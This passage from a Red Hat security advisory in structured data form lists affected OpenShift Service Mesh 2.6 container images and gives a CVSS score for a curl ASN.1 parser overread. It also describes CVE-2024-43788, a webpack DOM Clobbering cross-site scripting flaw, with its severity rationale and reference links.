"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "LOCAL", availabilityImpact: "HIGH", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Low", }, ], title: "curl: libcurl: ASN.1 date parser overread", }, { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: 